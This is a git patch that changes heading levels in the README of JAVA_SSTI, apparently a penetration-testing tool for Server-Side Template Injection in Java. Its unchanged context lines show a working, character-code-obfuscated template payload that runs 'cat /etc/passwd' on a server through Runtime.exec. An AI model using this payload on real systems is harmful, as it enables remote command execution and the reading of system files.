From c58e6fbb45874c51b60a141a74db8a249c1af41c Mon Sep 17 00:00:00 2001
From: 0xc7m <5663061+0xc7m@users.noreply.github.com>
Date: Tue, 2 Aug 2022 14:38:04 +0300
Subject: [PATCH] Update README.md

---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index c3c6284..57ecd99 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# JAVA_SSTI
+## JAVA_SSTI
 
 JAVA_SSTI.py assists the exploitation of Server-Side Template Injection vulnerabilities in java.
 The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tool during web application penetration tests.
@@ -23,6 +23,6 @@ python3 java_ssti.py 'cat /etc/passwd'
 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
 ```
 
-# Reference
+### References
 - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
 - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#java